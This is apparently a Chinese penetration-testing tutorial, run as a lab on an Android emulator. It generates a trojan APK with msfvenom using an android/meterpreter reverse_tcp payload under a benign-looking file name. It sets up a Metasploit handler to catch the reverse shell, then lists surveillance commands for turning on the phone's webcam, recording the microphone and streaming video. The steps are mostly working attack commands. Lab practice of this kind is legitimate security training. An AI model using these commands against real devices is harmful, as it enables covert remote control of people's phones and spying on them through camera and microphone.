目录
渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2
前言
系列文章列表
渗透测试基础之永恒之蓝漏洞复现
http://t.csdn.cn/EsMu2
思维导图
1,实验涉及复现环境
2,Android模拟器环境配置
2.1,首先从官网上下载雷电模拟器
雷电安卓模拟器-手游模拟器安卓版_android手机模拟器电脑版_雷电模拟器官网 (ldmnq.com)https://www.ldmnq.com/
2.2,安装雷电模拟器
2.3, 对模拟器网络进行配置
2.3.1,为什么要进行配置
2.3.2,进行配置
2.3.3,安装成功后显示安装成功
3,生成后门
3.1,生成木马apk文件
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.223.138 lport=5001 >内心如初.apk
3.2,将文件复制到windows系统上
3.3,将apk文件安装到模拟器中
3.4,木马文件安装成功
4,使用metasploit控制台对模拟器进行攻击
4.1 启动metasploit
msfconsole
4.2,使用攻击模块
use exploit/multi/handler
4.3,设置攻击载荷
set payload android/meterpreter/reverse_tcp
4.4,设置攻击机和端口号和攻击:
set lhost 192.168.xxx.xxx
set lport 5001
run
4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件
4.6 看到成功返回shell
5, 攻击成功后我们能做什么?
这里在进行其他操作前需要先加载stdapi扩展
load stdapi
5.1,查看模拟手机的版本信息
sysinfo
5.2,查看手机的网络信息
ifconfig
5.3,查看root状态
check_root
5.4,启用网页视屏聊天
webcam_chat
5.5,查看手机有几个摄像头
webcam_list
5.6,进行录音操作
record_mic
5.7,一些其他操作
webcam_snap
webcam_stream